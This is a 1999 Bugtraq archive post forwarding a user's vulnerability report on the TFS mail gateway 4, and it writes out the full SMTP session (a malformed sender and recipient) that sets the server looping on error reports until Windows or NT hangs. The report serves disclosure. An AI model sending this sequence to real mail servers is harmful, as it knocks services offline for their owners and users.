Bugtraq mailing list archives

I found this today and iam reporting it to you first!!! (fwd)

From: ah () SECURITYFOCUS COM (Alfred Huger)
Date: Mon, 30 Aug 1999 12:14:09 -0700

---------- Forwarded message ----------
Date: Mon, 30 Aug 1999 21:08:14 +0200
From: Hakan Franzen <fableman () hem passagen se>
To: vuldb () securityfocus com
Subject: I found this today and iam reporting it to you first!!!

Target: TFS mail system 4 (i think its working on earlier version aswell)  (TFS just got some award about there
security about emails)
Company makes the product:   www.tenfour.se
OS: win95 98 nt
Reported by: FableMan Noxidus a member of #HACK on IRCNet
a DoS routine:  Makes a FAST loop generating loooots of emails until its forced to stop by admin.

what i did is:  TELNET TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX 25
typing HELO
typing MAIL FROM:FABLEMAN NOXIDUS
RCPT TO:FIXYOUR RCPT TO:FIXYOUR SYSTEM. () TARGETSYSTEMRUNNING TFS MAIL GATE XXX
DATA
Fix you system
Error found by FableMan Noxidus a #HACK member of IRCNet
.
QUIT

Thats all  now the system tries to send to FIXYOUR Thats all  now the system tries to send to FIXYOUR SYSTEM. ()
TARGETSYSTEMRUNNING TFS MAIL GATE XXX
but that address is wrong soo then it generates a reporterror and mails to FABLEMAN NOXIDUS but cos i havent included a
@ then i will not go out on internet
then the loops starts.. its generating a reporterror and the loop is a truh..

I found it when i was playing around with a TFS mail gate system..

The speed of error report generation is about 1 or more email /sec soo if you start the loop and after 1 hr its a loot
of email generated...
until windows or NT hangs cos of it